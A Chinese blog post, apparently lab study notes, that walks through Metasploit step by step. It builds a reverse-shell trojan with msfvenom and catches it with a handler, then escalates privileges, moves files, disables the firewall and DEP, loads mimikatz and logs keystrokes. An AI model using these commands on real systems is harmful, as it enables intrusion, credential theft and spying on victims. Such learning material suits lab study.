木马与Meterpreter shell

1、在kali主机中,使用msfvenom生成木马

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.192 LPORT=4444-a x86 --platform windows -f exe -o /home/tyr/Desktop/hack.exe 生成木马

f7582d572f43994678c9bf1cbd5d03d.jpg

2、在reverse_tcp中设定的机器(本机)上进行监听

针对msf中的payload reverse_tcp 的监听需要msf中的监听模块打开msfconsole

使用 exploit/multi/handler 监听模块(用于接收木马的回弹请求)

设定监听的回弹请求类型为木马使用的payload类型 windows/meterpreter/reverse_tcp

设置在本机监听 set LHOST 192.168.1.192

端口默认为4444,不做设置

注意:设置的payload要和我们生成木马所使用的payload一样。

截图.png

靶机执行木马文件hack.exe,之后几乎同时监听窗口接收到回弹请求

截图.png

截图.png

成功获取到meterpreter shell,用以利用msf框架中丰富的扩展模块进行后渗透操作

提权

一般来说meterpreter shell的权限(运行木马程序的权限)都不是管理员权限,所以需要通过命令来提权才能进行一些敏感操作。

首先使用命令 getuid

截图.png

可以看到当前shell用户,(因此shell拥有的权限即为当前用户所拥有的权限)

使用命令 getsystem h 提升权限,命令 getsystem -t 1再次使用 getuid

截图.png

可以看到提升权限之后当前用户变成了系统管理员

使用命令 rev2self 可以回到原本的账户角色

截图.png

文件系统操作

1、文件下载

截图.png

使用命令 download "C:\Users\tyr\Desktop\hack.txt" 下载目标机器中的hack.txt

截图.png

截图.png

2、文件上传

使用命令上传文件 xxx.txt 到渗透的主机的 E 盘

upload /home/tyr/tangyanran.txt "E:\ruqin"

截图.png

查看如下:

截图.png

截图.png

系统命令操作

1、注册表操作

输入 reg 可以查看与目标机器注册表互动的相关选项及介绍

截图.png

2、获取目标机命令行交互窗口

使用命令 shell 可以获得目标机windows命令行窗口,可使用 exit 退出

截图.png

3、关闭防火墙

使用命令 netsh advfirewall set allprofiles state off

截图.png

4、关闭DEP(数据执行保护)

使用命令 Bcdedit.exe / set {current} nx Alwaysoff

截图.png

其他操作

1、屏幕截图

使用命令 screenshot 可以获得屏幕截图

截图.png

截图.png

2、加载kiwi模块(原mimikatz)

使用命令 load mimikatz 加载kiwi模块

截图.png

3、自动化常规操作

使用命令 run winenum 自动执行命令收集信息并将结果保存到本地

截图.png

4、键盘监控

使用命令 keyscan_startkeyscan_dump keyscan_stop 进行键盘记录开始、导出、停止。

截图.png

posted @ 2024-05-29 10:17  T-yr学习胶囊  阅读(63)  评论(0)    收藏  举报